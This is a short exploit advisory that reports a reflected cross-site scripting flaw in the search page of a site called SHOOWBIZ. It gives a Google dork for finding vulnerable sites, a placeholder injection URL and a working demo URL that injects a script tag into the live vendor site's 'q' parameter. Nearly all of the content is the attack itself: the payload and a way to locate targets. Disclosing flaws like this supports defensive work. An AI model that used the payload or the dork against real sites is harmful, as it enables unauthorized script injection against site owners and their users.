****************************
#Exploit Title: SHOOWBIZ - Cross Site Scripting Vulnerability (XSS)
#Date: 2020-08-17
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://shoowbiz.ru
#Google Dork: inurl:"search.php?q="
#Tested On: windows 10
Proof of Concept:
1-Search dork
2-https://target/search.php?q=" > [XSS Inject Payload ]
Demo: https://shoowbiz.ru/search.php?q=Technotronic%3CScRipT%3Ealert(%22XSS%22);%3C/ScRipT%3E
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************